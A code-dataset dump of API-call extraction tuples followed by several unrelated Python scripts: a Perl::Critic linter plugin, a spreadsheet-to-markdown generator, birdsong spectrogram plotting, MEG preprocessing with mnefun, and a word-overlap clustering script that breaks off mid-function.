[((700, 713), 'numpy.load', 'np.load', (['conn'], {}), '(conn)\n', (707, 713), True, 'import numpy as np\n'), ((1462, 1535), 'os.path.isfile', 'os.path.isfile', (["(read_dir + 'fake_t_vals_' + freq + window + cons + '.mat')"], {}), "(read_dir + 'fake_t_vals_' + freq + window + cons + '.mat')\n", (1476, 1535), False, 'import os\n'), ((3735, 3805), 'numpy.load', 'np.load', (["(results_dir + 'max_clu_lens_' + freq + window + cons + '.npy')"], {}), "(results_dir + 'max_clu_lens_' + freq + window + cons + '.npy')\n", (3742, 3805), True, 'import numpy as np\n'), ((3858, 3871), 'matplotlib.pyplot.figure', 'plt.figure', (['(0)'], {}), '(0)\n', (3868, 3871), True, 'import matplotlib.pyplot as plt\n'), ((3884, 3906), 'matplotlib.pyplot.hist', 'plt.hist', (['max_clu_lens'], {}), '(max_clu_lens)\n', (3892, 3906), True, 'import matplotlib.pyplot as plt\n'), ((3925, 3957), 'scipy.stats.gaussian_kde', 'stats.gaussian_kde', (['max_clu_lens'], {}), '(max_clu_lens)\n', (3943, 3957), False, 'from scipy import stats\n'), ((4126, 4139), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {}), '(1)\n', (4136, 4139), True, 'import matplotlib.pyplot as plt\n'), ((4152, 4166), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'p'], {}), '(x, p)\n', (4160, 4166), True, 'import matplotlib.pyplot as plt\n'), ((4179, 4203), 'matplotlib.pyplot.hlines', 'plt.hlines', (['(0.095)', '(0)', '(14)'], {}), '(0.095, 0, 14)\n', (4189, 4203), True, 'import matplotlib.pyplot as plt\n'), ((4300, 4320), 'numpy.max', 'np.max', (['max_clu_lens'], {}), '(max_clu_lens)\n', (4306, 4320), True, 'import numpy as np\n'), ((4421, 4692), 'permutation_cluster_test_AT._permutation_cluster_test_AT', '_permutation_cluster_test_AT', (['real_values'], {'threshold': 'threshold[0][0]', 'n_permutations': '(1)', 'tail': '(0)', 'connectivity': 'connectivity_sparse', 'n_jobs': '(4)', 'seed': '(10)', 'max_step': '(1)', 't_power': '(1)', 'out_type': '"""indices"""', 'exclude': 'None', 'step_down_p': '(0)', 'check_disjoint': '(False)', 'buffer_size': '(1000)'}), "(real_values, threshold=threshold[0][0],\n n_permutations=1, tail=0, connectivity=connectivity_sparse, n_jobs=4,\n seed=10, max_step=1, t_power=1, out_type='indices', exclude=None,\n step_down_p=0, check_disjoint=False, buffer_size=1000)\n", (4449, 4692), False, 'from permutation_cluster_test_AT import _permutation_cluster_test_AT\n'), ((5723, 5736), 'matplotlib.pyplot.figure', 'plt.figure', (['(1)'], {}), '(1)\n', (5733, 5736), True, 'import matplotlib.pyplot as plt\n'), ((5749, 5771), 'matplotlib.pyplot.hist', 'plt.hist', (['max_clu_lens'], {}), '(max_clu_lens)\n', (5757, 5771), True, 'import matplotlib.pyplot as plt\n'), ((5784, 5802), 'matplotlib.pyplot.hist', 'plt.hist', (['clu_lens'], {}), '(clu_lens)\n', (5792, 5802), True, 'import matplotlib.pyplot as plt\n'), ((6188, 6245), 'numpy.save', 'np.save', (["(results_dir + 'clu_' + freq + window + cons)", 'clu'], {}), "(results_dir + 'clu_' + freq + window + cons, clu)\n", (6195, 6245), True, 'import numpy as np\n'), ((1653, 1719), 'scipy.io.loadmat', 'loadmat', (["(read_dir + 'fake_t_vals_' + freq + window + cons + '.mat')"], {}), "(read_dir + 'fake_t_vals_' + freq + window + cons + '.mat')\n", (1660, 1719), False, 'from scipy.io import loadmat\n'), ((1801, 1867), 'scipy.io.loadmat', 'loadmat', (["(read_dir + 'real_t_vals_' + freq + window + cons + '.mat')"], {}), "(read_dir + 'real_t_vals_' + freq + window + cons + '.mat')\n", (1808, 1867), False, 'from scipy.io import loadmat\n'), ((1978, 2055), 'scipy.io.loadmat', 'loadmat', (["(read_dir + 'tthreshold_uncorrected_' + freq + window + cons + '.mat')"], {}), "(read_dir + 'tthreshold_uncorrected_' + freq + window + cons + '.mat')\n", (1985, 2055), False, 'from scipy.io import loadmat\n'), ((6360, 6387), 'numpy.where', 'np.where', (['(clu_lens > cutoff)'], {}), '(clu_lens > cutoff)\n', (6368, 6387), True, 'import numpy as np\n'), ((6099, 6108), 'numpy.int', 'np.int', (['l'], {}), '(l)\n', (6105, 6108), True, 'import numpy as np\n')]
|
"""Apply Perl::Critic tool and gather results."""
from __future__ import print_function
import subprocess
from statick_tool.issue import Issue
from statick_tool.tool_plugin import ToolPlugin
class PerlCriticToolPlugin(ToolPlugin):
"""Apply Perl::Critic tool and gather results."""
def get_name(self):
"""Get name of tool."""
return "perlcritic"
def gather_args(self, args):
"""Gather arguments."""
args.add_argument("--perlcritic-bin", dest="perlcritic_bin", type=str,
help="perlcritic binary path")
def scan(self, package, level):
"""Run tool and gather output."""
if "perl_src" not in package:
return []
if not package["perl_src"]:
return []
perlcritic_bin = "perlcritic"
if self.plugin_context.args.perlcritic_bin is not None:
perlcritic_bin = self.plugin_context.args.perlcritic_bin
flags = ["--nocolor", "--verbose=%f:::%l:::%p:::%m:::%s\n"]
flags += self.get_user_flags(level)
files = []
if "perl_src" in package:
files += package["perl_src"]
try:
output = subprocess.check_output([perlcritic_bin] + flags + files,
stderr=subprocess.STDOUT,
universal_newlines=True).join(' ')
except subprocess.CalledProcessError as ex:
output = ex.output
if ex.returncode != 2:
print("perlcritic failed! Returncode = {}".
format(str(ex.returncode)))
print("{}".format(ex.output))
return []
except OSError as ex:
print("Couldn't find %s! (%s)" % (perlcritic_bin, ex))
return []
if self.plugin_context.args.show_tool_output:
print("{}".format(output))
with open(self.get_name() + ".log", "wt") as f:
f.write(output)
issues = self.parse_output(output.split('\n'))
return issues
def parse_output(self, output):
"""Parse tool output and report issues."""
issues = []
# Load the plugin mapping if possible
warnings_mapping = self.load_mapping()
for line in output:
split_line = line.strip().split(':::')
# Should split into five segments, anything less is invalid.
if len(split_line) < 5:
continue
cert_reference = None
if split_line[2].replace('::', '__') in warnings_mapping.keys():
cert_reference = warnings_mapping[split_line[2].replace('::', '__')]
issues.append(Issue(split_line[0], split_line[1],
self.get_name(), split_line[2],
split_line[4], split_line[3], cert_reference))
return issues
|
[
"subprocess.check_output"
] |
[((1189, 1302), 'subprocess.check_output', 'subprocess.check_output', (['([perlcritic_bin] + flags + files)'], {'stderr': 'subprocess.STDOUT', 'universal_newlines': '(True)'}), '([perlcritic_bin] + flags + files, stderr=subprocess\n .STDOUT, universal_newlines=True)\n', (1212, 1302), False, 'import subprocess\n')]
|
#! /usr/bin/python3
import gspread
import json
import os
import re
from oauth2client.service_account import ServiceAccountCredentials
from util import author_to_file_path, get_excerpt_from_page, get_valid_author_slug, title_to_file_path
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
creds = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
client = gspread.authorize(creds)
articles = client.open("Bitcoin Resources").worksheet("Curations")
for idx, row in enumerate(articles.get_all_values()):
if row[0] == 'Title':
continue
curation_title = row[0].lstrip().rstrip()
curation_link = row[1]
curation_author = row[2].lstrip().rstrip()
curation_type = row[3].lstrip().rstrip()
curation_star = row[4].lstrip().rstrip()
md_file_path = title_to_file_path(curation_title, 'curations')
if md_file_path == "":
continue
md_file = (
f"---\n"
f"layout: page\n"
f"title: {curation_title}\n"
f"link: {curation_link}\n"
f"author: {curation_author}\n"
f"type: {curation_type}\n"
f"star: {curation_star}\n"
f"order: {idx}\n"
f"---\n")
with open(md_file_path, 'w') as f:
f.write(md_file)
|
[
"oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name",
"gspread.authorize",
"util.title_to_file_path"
] |
[((347, 424), 'oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_name', 'ServiceAccountCredentials.from_json_keyfile_name', (['"""client_secret.json"""', 'scope'], {}), "('client_secret.json', scope)\n", (395, 424), False, 'from oauth2client.service_account import ServiceAccountCredentials\n'), ((434, 458), 'gspread.authorize', 'gspread.authorize', (['creds'], {}), '(creds)\n', (451, 458), False, 'import gspread\n'), ((856, 903), 'util.title_to_file_path', 'title_to_file_path', (['curation_title', '"""curations"""'], {}), "(curation_title, 'curations')\n", (874, 903), False, 'from util import author_to_file_path, get_excerpt_from_page, get_valid_author_slug, title_to_file_path\n')]
|
"""Plotting function for birdsonganalysis."""
import numpy as np
import seaborn as sns
import matplotlib.patches as p
import matplotlib.pyplot as plt
from .songfeatures import spectral_derivs
from .constants import FREQ_RANGE
def spectral_derivs_plot(spec_der, contrast=0.1, ax=None, freq_range=None,
fft_step=None, fft_size=None):
"""
Plot the spectral derivatives of a song in a grey scale.
spec_der - The spectral derivatives of the song (computed with
`spectral_derivs`) or the song itself
contrast - The contrast of the plot
ax - The matplotlib axis where the plot must be drawn, if None, a new axis
is created
freq_range - The amount of frequency to plot, usefull only if `spec_der` is
a song. Given to `spectral_derivs`
ov_params - The Parameters to override, passed to `spectral_derivs`
"""
if spec_der.ndim == 1:
spec_der = spectral_derivs(spec_der, freq_range, fft_step, fft_size)
ax = sns.heatmap(spec_der.T, yticklabels=50, xticklabels=50,
vmin=-contrast, vmax=contrast, ax=ax, cmap='Greys',
cbar=False)
ax.invert_yaxis()
return ax
def plot_over_spec(data, ax, freq_range=FREQ_RANGE, zoom=1, **plot_params):
"""
Plot the feature over a spectral derivatives plot.
The data are first normalized then rescale to fit the ylim of the axis.
"""
# Normalize the data so that they fit in the graph
ndata = (data - np.nanmin(data)) / (np.nanmax(data) - np.nanmin(data))
# We take for abscisse axis the line corresponding to 5% of freq_range
# We rescale the data so that they take 75% of the graph
ax.plot(zoom * (5/100 * freq_range + 75/100 * freq_range * ndata),
**plot_params)
return ax
def similarity_plot(sim, song, refsong):
"""Do a similarity plot with the result of `bsa.similarity`."""
fig, ax = plt.subplots(2, 2, figsize=(13, 13),
gridspec_kw={'width_ratios': [1, 4],
'height_ratios': [1, 4]})
ax[0, 0].axis('off')
sds = spectral_derivs(song)
sdr = spectral_derivs(refsong)
ax[0, 1] = spectral_derivs_plot(sds, 0.05, ax[0, 1])
ax[0, 1].set_title('Song')
ax[1, 0] = spectral_derivs_plot(np.flip(sdr.T, 1), 0.05,
ax[1, 0])
ax[1, 0].set_title('Reference Song')
ax[1, 1] = sns.heatmap(sim['glob_matrix'], ax=ax[1, 1], cbar=False,
vmin=0, vmax=1)
for section in sim['sections']:
xy = (section['beg'][0],
sim['glob_matrix'].shape[1] - section['end'][1])
width = section['end'][0] - section['beg'][0]
height = section['end'][1] - section['beg'][1]
ax[1, 1].add_patch(p.Rectangle(xy, width, height, fill=False,
edgecolor='y', linewidth=3))
return fig
|
[
"numpy.flip",
"seaborn.heatmap",
"matplotlib.patches.Rectangle",
"numpy.nanmin",
"matplotlib.pyplot.subplots",
"numpy.nanmax"
] |
[((1018, 1141), 'seaborn.heatmap', 'sns.heatmap', (['spec_der.T'], {'yticklabels': '(50)', 'xticklabels': '(50)', 'vmin': '(-contrast)', 'vmax': 'contrast', 'ax': 'ax', 'cmap': '"""Greys"""', 'cbar': '(False)'}), "(spec_der.T, yticklabels=50, xticklabels=50, vmin=-contrast,\n vmax=contrast, ax=ax, cmap='Greys', cbar=False)\n", (1029, 1141), True, 'import seaborn as sns\n'), ((1945, 2048), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(2)'], {'figsize': '(13, 13)', 'gridspec_kw': "{'width_ratios': [1, 4], 'height_ratios': [1, 4]}"}), "(2, 2, figsize=(13, 13), gridspec_kw={'width_ratios': [1, 4],\n 'height_ratios': [1, 4]})\n", (1957, 2048), True, 'import matplotlib.pyplot as plt\n'), ((2455, 2527), 'seaborn.heatmap', 'sns.heatmap', (["sim['glob_matrix']"], {'ax': 'ax[1, 1]', 'cbar': '(False)', 'vmin': '(0)', 'vmax': '(1)'}), "(sim['glob_matrix'], ax=ax[1, 1], cbar=False, vmin=0, vmax=1)\n", (2466, 2527), True, 'import seaborn as sns\n'), ((2328, 2345), 'numpy.flip', 'np.flip', (['sdr.T', '(1)'], {}), '(sdr.T, 1)\n', (2335, 2345), True, 'import numpy as np\n'), ((1517, 1532), 'numpy.nanmin', 'np.nanmin', (['data'], {}), '(data)\n', (1526, 1532), True, 'import numpy as np\n'), ((1537, 1552), 'numpy.nanmax', 'np.nanmax', (['data'], {}), '(data)\n', (1546, 1552), True, 'import numpy as np\n'), ((1555, 1570), 'numpy.nanmin', 'np.nanmin', (['data'], {}), '(data)\n', (1564, 1570), True, 'import numpy as np\n'), ((2823, 2893), 'matplotlib.patches.Rectangle', 'p.Rectangle', (['xy', 'width', 'height'], {'fill': '(False)', 'edgecolor': '"""y"""', 'linewidth': '(3)'}), "(xy, width, height, fill=False, edgecolor='y', linewidth=3)\n", (2834, 2893), True, 'import matplotlib.patches as p\n')]
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 Tuhinshubhra
import cmseekdb.basic as cmseek
# I know there is no reason at all to create a separate module for this.. there's something that's going to be added here so.. trust me!
def start(source):
# print(source)
if 'Joomla! Debug Console' in source or 'xdebug.org/docs/all_settings' in source:
cmseek.success('Debug mode on!')
return '1'
else:
return '0'
|
[
"cmseekdb.basic.success"
] |
[((452, 484), 'cmseekdb.basic.success', 'cmseek.success', (['"""Debug mode on!"""'], {}), "('Debug mode on!')\n", (466, 484), True, 'import cmseekdb.basic as cmseek\n')]
|
# -*- coding: utf-8 -*-
# Authors: <NAME>; <NAME>; <NAME> <<EMAIL>>
#
#
# License: BSD (3-clause)
import numpy as np
import mnefun
import os
#import glob
os.chdir('/home/sjjoo/git/BrainTools/projects/NLR_MEG')
from score import score
from nlr_organizeMEG_mnefun import nlr_organizeMEG_mnefun
import mne
import time
#import pycuda.driver
#import pycuda.autoinit
t0 = time.time()
mne.set_config('MNE_USE_CUDA', 'true')
# At Possum projects folder mounted in the local disk
raw_dir = '/mnt/diskArray/projects/MEG/nlr/raw'
# At local hard drive
out_dir = '/mnt/scratch/NLR_MEG_Sensor'
if not os.path.isdir(out_dir):
os.mkdir(out_dir)
subs = ['NLR_102_RS','NLR_103_AC','NLR_105_BB','NLR_110_HH','NLR_127_AM',
'NLR_130_RW','NLR_132_WP','NLR_133_ML','NLR_145_AC','NLR_150_MG',
'NLR_151_RD','NLR_152_TC','NLR_160_EK','NLR_161_AK','NLR_163_LF',
'NLR_164_SF','NLR_170_GM','NLR_172_TH','NLR_174_HS','NLR_179_GM',
'NLR_180_ZD','NLR_187_NB','NLR_201_GS','NLR_203_AM',
'NLR_204_AM','NLR_205_AC','NLR_206_LM','NLR_207_AH','NLR_211_LB',
'NLR_GB310','NLR_KB218','NLR_JB423','NLR_GB267','NLR_JB420',
'NLR_HB275','NLR_197_BK','NLR_GB355','NLR_GB387','NLR_HB205',
'NLR_IB217','NLR_IB319','NLR_JB227','NLR_JB486','NLR_KB396',
'NLR_IB357']
# tmin, tmax: sets the epoch
# bmin, bmax: sets the prestim duration for baseline correction. baseline is set
# as individual as default. Refer to _mnefun.py bmax is 0.0 by default
# hp_cut, lp_cut: set cutoff frequencies for highpass and lowpass
# I found that hp_cut of 0.03 is problematic because the tansition band is set
# to 5 by default, which makes the negative stopping frequency (0.03-5).
# It appears that currently data are acquired (online) using bandpass filter
# (0.03 - 326.4 Hz), so it might be okay not doing offline highpass filtering.
# It's worth checking later though. However, I think we should do baseline
# correction by setting bmin and bmax. I found that mnefun does baseline
# correction by default.
# sjjoo_20160809: Commented
#params = mnefun.Params(tmin=-0.1, tmax=0.9, n_jobs=18, # t_adjust was -39e-3
# decim=2, n_jobs_mkl=1, proj_sfreq=250,
# n_jobs_fir='cuda', n_jobs_resample='cuda',
# filter_length='5s', epochs_type='fif', lp_cut=40.,
## hp_cut=0.15,hp_trans=0.1,
# bmin=-0.1, auto_bad=20., plot_raw=False,
# bem_type = '5120-5120-5120')
# This sets the position of the head relative to the sensors. These values a
# A typical head position. So now in sensor space everyone is aligned. However
# We should also note that for source analysis it is better to leave this as
# the mne-fun default ==> Let's put None!!!
""" Organize subjects """
#out,ind = nlr_organizeMEG_mnefun(raw_dir=raw_dir,out_dir=out_dir,subs=subs)
""" The directory structure is really messy -- let's not use this function. """
os.chdir(out_dir)
#
#print(out)
#params.subjects.sort() # Sort the subject list
#print("Done sorting subjects.\n")
""" Attention!!!
164_sf160707_4_raw.fif: continuous HPI was not active in this file!
170_gm160613_5_raw.fif: in _fix_raw_eog_cals...non equal eog arrays???
172_th160825_6_raw.fif: origin of head out of helmet
201_gs150729_2_raw.fif: continuous HPI was not active in this file!
174_hs160620_1_raw.fif: Too many bad channels (62 based on grad=4000e-13, mag=4.0e-12)
174_hs160829_1_raw.fif: Too many bad channels (62 based on grad=4000e-13, mag=4.0e-12)
163_lf160707 : Too many bad channels --> Use grad=5000e-13, mag=5.0e-12
163_lf160920 : : Too many bad channels --> Use grad=5000e-13, mag=5.0e-12
"""
#for n, s in enumerate(badsubs):
# subnum = out.index(s)
# print('Removing subject ' + str(subnum) + ' ' + out[subnum])
# out.remove(s)
# ind[subnum] = []
# ind.remove([])
out = ['102_rs160618','103_ac150609','105_bb150713','110_hh160608','127_am151022',
'130_rw151221','132_wp160919','133_ml151124','145_ac160621','150_mg160606',
'151_rd160620','152_tc160422','160_ek160627','161_ak160627','163_lf160707',
'164_sf160707','170_gm160613','172_th160614','174_hs160620','179_gm160701',
'180_zd160621','187_nb161017','201_gs150818','203_am150831',
'204_am150829','205_ac151123','206_lm151119','207_ah160608','211_lb160617',
'nlr_gb310170614','nlr_kb218170619','nlr_jb423170620','nlr_gb267170620','nlr_jb420170621',
'nlr_hb275170622','197_bk170622','nlr_gb355170606','nlr_gb387170608','nlr_hb205170825',
'nlr_ib217170831','nlr_ib319170825','nlr_jb227170811','nlr_jb486170803','nlr_kb396170808',
'nlr_ib357170912']
#%%
out = ['102_rs160618','103_ac150609','105_bb150713','110_hh160608','127_am151022',
'130_rw151221','132_wp160919','133_ml151124','145_ac160621','150_mg160606',
'151_rd160620','152_tc160422','160_ek160627','161_ak160627','163_lf160707',
'164_sf160707','170_gm160613','172_th160614','174_hs160620','179_gm160701',
'180_zd160621','187_nb161017','201_gs150818','203_am150831',
'204_am150829','205_ac151123','206_lm151119','207_ah160608','211_lb160617',
'nlr_gb310170614','nlr_kb218170619','nlr_jb423170620','nlr_gb267170620','nlr_jb420170621',
'nlr_hb275170622','197_bk170622','nlr_gb355170606','nlr_gb387170608','nlr_hb205170825',
'nlr_ib217170831','nlr_ib319170825','nlr_jb227170811','nlr_jb486170803','nlr_kb396170808',
'nlr_ib357170912']
out = ['211_lb160617']
for n, s in enumerate(out):
print(s)
for n, s in enumerate(out):
params = mnefun.Params(tmin=-0.1, tmax=0.9, n_jobs=18, # t_adjust was -39e-3
decim=2, n_jobs_mkl=1, proj_sfreq=250,
n_jobs_fir='cuda', n_jobs_resample='cuda',
filter_length='5s', epochs_type='fif', lp_cut=40.,
# hp_cut=0.15,hp_trans=0.1,
bmin=-0.1, auto_bad=20., plot_raw=False)
# bem_type = '5120-5120-5120')
params.subjects = [s]
params.sss_type = 'python'
params.sss_regularize = 'in' # 'in' by default
params.tsss_dur = 8. # 60 for adults with not much head movements. This was set to 6.
params.st_correlation = 0.9
params.auto_bad_meg_thresh = 10 # THIS SHOULD NOT BE SO HIGH!
params.trans_to = 'median' #(0., 0., .03) #'median' # None
params.t_adjust = -39e-3 # time delay from the trigger. It's due to set trigger function. I don't know why...
#print("Running " + str(len(params.subjects)) + ' Subjects')
# print("\n\n".join(params.subjects))
print("\n\n")
print("Running " + str(params.subjects))
print("\n\n")
params.subject_indices = np.arange(0,len(params.subjects))
params.structurals =[None] * len(params.subjects)
if s == '164_sf160707':
params.run_names = ['%s_1', '%s_2', '%s_3', '%s_5','%s_6'] # 164_sf160707
elif s == '170_gm160613':
params.run_names = ['%s_1', '%s_2', '%s_3', '%s_5','%s_6'] # 170_gm160613
elif s == '201_gs150729':
params.run_names = ['%s_1', '%s_3', '%s_4', '%s_5', '%s_6', '%s_8'] # 201_gs150729
elif s == '204_am151120':
params.run_names = ['%s_1', '%s_3', '%s_4', '%s_5', '%s_6'] # 204_am151120
elif s == '105_bb161011':
params.run_names = ['%s_1', '%s_2', '%s_4','%s_5','%s_6']
elif s == 'nlr_ib357170912':
params.run_names = ['%s_1', '%s_2', '%s_4','%s_5','%s_6']
elif s == 'nlr_gb355170606':
params.run_names = ['%s_1', '%s_2', '%s_3','%s_5','%s_6']
else:
params.run_names = ['%s_1', '%s_2', '%s_3', '%s_4', '%s_5', '%s_6']
#params.subject_run_indices = np.array([
# np.arange(0,ind[0]),np.arange(0,ind[1]),np.arange(0,ind[2]),np.arange(0,ind[3]),
# np.arange(0,ind[4]),np.arange(0,ind[5]),np.arange(0,ind[6]),np.arange(0,ind[7]),
# np.arange(0,ind[8]),np.arange(0,ind[9])#,np.arange(0,ind[11])
## np.arange(0,ind[12]),np.arange(0,ind[13]),np.arange(0,ind[14]),np.arange(0,ind[15]),
## np.arange(0,ind[16]),np.arange(0,ind[17]),np.arange(0,ind[18]),np.arange(0,ind[19]),
## np.arange(0,ind[20]),np.arange(0,ind[21]),np.arange(0,ind[22]),np.arange(0,ind[23]),
## np.arange(0,ind[24])
#])
params.dates = [(2014, 0, 00)] * len(params.subjects)
#params.subject_indices = [0]
# params.score = score # scoring function to use
params.plot_drop_logs = False
params.on_missing = 'warning'
#params.acq_ssh = '<EMAIL>' # minea - 172.28.161.8
#params.acq_dir = '/sinuhe/data03/jason_words'
# params.acq_ssh = '<EMAIL>' # minea - 172.28.161.8
# params.acq_dir = '/sinuhe/data03/jason_words'
# params.sws_ssh = '<EMAIL>' # kasga - 172.28.161.8
# params.sws_dir = '/data05/jason/NLR'
#params.mf_args = '-hpie 30 -hpig .8 -hpicons' # sjjoo-20160826: We are doing SSS using python
# epoch
if s == '174_hs160620':
params.reject = dict(grad=3000e-13, mag=4.0e-12)
else:
params.reject = dict(grad=3000e-13, mag=4.0e-12)
# params.reject = dict(grad=4000e-13, mag=4.0e-12)
params.ssp_eog_reject = dict(grad=params.reject['grad'], mag=params.reject['mag'], eog=np.inf)
params.ssp_ecg_reject = dict(grad=params.reject['grad'], mag=params.reject['mag'], ecg=np.inf)
params.flat = dict(grad=1e-13, mag=1e-15)
params.auto_bad_reject = dict(grad=2*params.reject['grad'], mag=2*params.reject['mag'])
params.auto_bad_flat = params.flat
params.cov_method = 'shrunk'
params.get_projs_from = range(len(params.run_names))
params.inv_names = ['%s']
params.inv_runs = [range(0, len(params.run_names))]
params.runs_empty = []
params.proj_nums = [[0, 0, 0], # ECG: grad/mag/eeg
[1, 1, 0], # EOG # sjjoo-20160826: was 3
[0, 0, 0]] # Continuous (from ERM)
# The scoring function needs to produce an event file with these values
params.in_names = ['word_c254_p20_dot', 'word_c254_p50_dot', 'word_c137_p20_dot',
'word_c254_p80_dot', 'word_c137_p80_dot',
'bigram_c254_p20_dot', 'bigram_c254_p50_dot', 'bigram_c137_p20_dot',
'word_c254_p20_word', 'word_c254_p50_word', 'word_c137_p20_word',
'word_c254_p80_word', 'word_c137_p80_word',
'bigram_c254_p20_word', 'bigram_c254_p50_word', 'bigram_c137_p20_word']
params.in_numbers = [101, 102, 103, 104, 105, 106, 107, 108,
201, 202, 203, 204, 205, 206, 207, 208]
# These lines define how to translate the above event types into evoked files
params.analyses = [
'All',
'Conditions'
]
params.out_names = [
['ALL'],
['word_c254_p20_dot', 'word_c254_p50_dot', 'word_c137_p20_dot',
'word_c254_p80_dot', 'word_c137_p80_dot',
'bigram_c254_p20_dot', 'bigram_c254_p50_dot', 'bigram_c137_p20_dot',
'word_c254_p20_word', 'word_c254_p50_word', 'word_c137_p20_word',
'word_c254_p80_word', 'word_c137_p80_word',
'bigram_c254_p20_word', 'bigram_c254_p50_word', 'bigram_c137_p20_word']
]
params.out_numbers = [
[1] * len(params.in_numbers),
[101, 102, 103, 104, 105, 106, 107, 108,
201, 202, 203, 204, 205, 206, 207, 208]
]
params.must_match = [
[],
[],
]
# Set what will run
mnefun.do_processing(
params,
fetch_raw=False, # Fetch raw recording files from acquisition machine
do_score=False, # Do scoring to slice data into trials
# Before running SSS, make SUBJ/raw_fif/SUBJ_prebad.txt file with
# space-separated list of bad MEG channel numbers
push_raw=False, # Push raw files and SSS script to SSS workstation
do_sss=False, # Run SSS remotely (on sws) or locally with mne-python
fetch_sss=False, # Fetch SSSed files from SSS workstation
do_ch_fix=False, # Fix channel ordering
# Before running SSP, examine SSS'ed files and make
# SUBJ/bads/bad_ch_SUBJ_post-sss.txt; usually, this should only contain EEG
# channels.
gen_ssp=True, # Generate SSP vectors
apply_ssp=True, # Apply SSP vectors and filtering
# plot_psd=False, # Plot raw data power spectra
write_epochs=True, # Write epochs to disk
gen_covs=False, # Generate covariances
# Make SUBJ/trans/SUBJ-trans.fif using mne_analyze; needed for fwd calc.
gen_fwd=False, # Generate forward solutions (and src space if needed)
gen_inv=False, # Generate inverses
gen_report=False, # Write mne report html of results to disk
print_status=False, # Print completeness status update
# params,
# fetch_raw=False,
# do_score=True, # True
# push_raw=False,
# do_sss=True, # True
# fetch_sss=False,
# do_ch_fix=True, # True
# gen_ssp=True, # True
# apply_ssp=True, # True
# write_epochs=True, # True
# plot_psd=False,
# gen_covs=False,
# gen_fwd=False,
# gen_inv=False,
# print_status=False,
# gen_report=True # true
)
print('%i sec' % (time.time() - t0,))
|
[
"os.mkdir",
"os.path.isdir",
"mnefun.do_processing",
"time.time",
"mne.set_config",
"mnefun.Params",
"os.chdir"
] |
[((156, 211), 'os.chdir', 'os.chdir', (['"""/home/sjjoo/git/BrainTools/projects/NLR_MEG"""'], {}), "('/home/sjjoo/git/BrainTools/projects/NLR_MEG')\n", (164, 211), False, 'import os\n'), ((369, 380), 'time.time', 'time.time', ([], {}), '()\n', (378, 380), False, 'import time\n'), ((382, 420), 'mne.set_config', 'mne.set_config', (['"""MNE_USE_CUDA"""', '"""true"""'], {}), "('MNE_USE_CUDA', 'true')\n", (396, 420), False, 'import mne\n'), ((2997, 3014), 'os.chdir', 'os.chdir', (['out_dir'], {}), '(out_dir)\n', (3005, 3014), False, 'import os\n'), ((595, 617), 'os.path.isdir', 'os.path.isdir', (['out_dir'], {}), '(out_dir)\n', (608, 617), False, 'import os\n'), ((623, 640), 'os.mkdir', 'os.mkdir', (['out_dir'], {}), '(out_dir)\n', (631, 640), False, 'import os\n'), ((5644, 5878), 'mnefun.Params', 'mnefun.Params', ([], {'tmin': '(-0.1)', 'tmax': '(0.9)', 'n_jobs': '(18)', 'decim': '(2)', 'n_jobs_mkl': '(1)', 'proj_sfreq': '(250)', 'n_jobs_fir': '"""cuda"""', 'n_jobs_resample': '"""cuda"""', 'filter_length': '"""5s"""', 'epochs_type': '"""fif"""', 'lp_cut': '(40.0)', 'bmin': '(-0.1)', 'auto_bad': '(20.0)', 'plot_raw': '(False)'}), "(tmin=-0.1, tmax=0.9, n_jobs=18, decim=2, n_jobs_mkl=1,\n proj_sfreq=250, n_jobs_fir='cuda', n_jobs_resample='cuda',\n filter_length='5s', epochs_type='fif', lp_cut=40.0, bmin=-0.1, auto_bad\n =20.0, plot_raw=False)\n", (5657, 5878), False, 'import mnefun\n'), ((11634, 11905), 'mnefun.do_processing', 'mnefun.do_processing', (['params'], {'fetch_raw': '(False)', 'do_score': '(False)', 'push_raw': '(False)', 'do_sss': '(False)', 'fetch_sss': '(False)', 'do_ch_fix': '(False)', 'gen_ssp': '(True)', 'apply_ssp': '(True)', 'write_epochs': '(True)', 'gen_covs': '(False)', 'gen_fwd': '(False)', 'gen_inv': '(False)', 'gen_report': '(False)', 'print_status': '(False)'}), '(params, fetch_raw=False, do_score=False, push_raw=\n False, do_sss=False, fetch_sss=False, do_ch_fix=False, gen_ssp=True,\n apply_ssp=True, write_epochs=True, gen_covs=False, gen_fwd=False,\n gen_inv=False, gen_report=False, print_status=False)\n', (11654, 11905), False, 'import mnefun\n'), ((13517, 13528), 'time.time', 'time.time', ([], {}), '()\n', (13526, 13528), False, 'import time\n')]
|
import bag_of_wording
import argparse
from collections import Iterable, OrderedDict
def find_most_similar(bags_of_words):
biggest_overlap = [0, (0, 0)]
keys = list(bags_of_words)
for i in range(len(keys) - 1):
for j in range(i + 1, len(keys)):
seq1 = bags_of_words[keys[i]]
seq2 = bags_of_words[keys[j]]
try:
norm_overlap = len(seq1.intersection(seq2)) / max(len(seq1), len(seq2))
except ZeroDivisionError: # in case the BoW-extraction left an empty set
norm_overlap = 0
if norm_overlap > biggest_overlap[0]:
biggest_overlap[0] = norm_overlap
biggest_overlap[1] = (keys[i], keys[j])
return biggest_overlap
def word_overlap_clustering(queries, bags_of_words, overlap_threshold):
for query in queries:
bows_for_query = {k: v for k, v in bags_of_words.items() if k.split('.')[0] == query}
bows_for_query = OrderedDict(sorted(bows_for_query.items(), key=lambda t: t[0])) # ensures stability of the clustering through multiple runs
while True:
overlap, to_merge = find_most_similar(bows_for_query)
if overlap <= overlap_threshold:
yield bows_for_query.keys()
break
bows_for_query[to_merge] = bows_for_query[to_merge[0]].union(bows_for_query[to_merge[1]])
bows_for_query.pop(to_merge[0])
bows_for_query.pop(to_merge[1])
def flatten(sequence):
"""
Since the clustering produces hierarchical clusters in the form ((((1,2),3),(4,5)),6), a 'flattening'
is needed in order to write the desired output.
((((1,2),3),(4,5)),6) -> (1, 2, 3, 4, 5, 6)
"""
for elm in sequence:
if isinstance(elm, Iterable) and not isinstance(elm, str):
yield from flatten(elm)
else:
yield elm
def write_output(clustering, filename):
with open(filename, 'w') as f:
f.write('subTopicID\tresultID\n')
for query in clustering:
for i, cluster in enumerate(query):
for element in cluster:
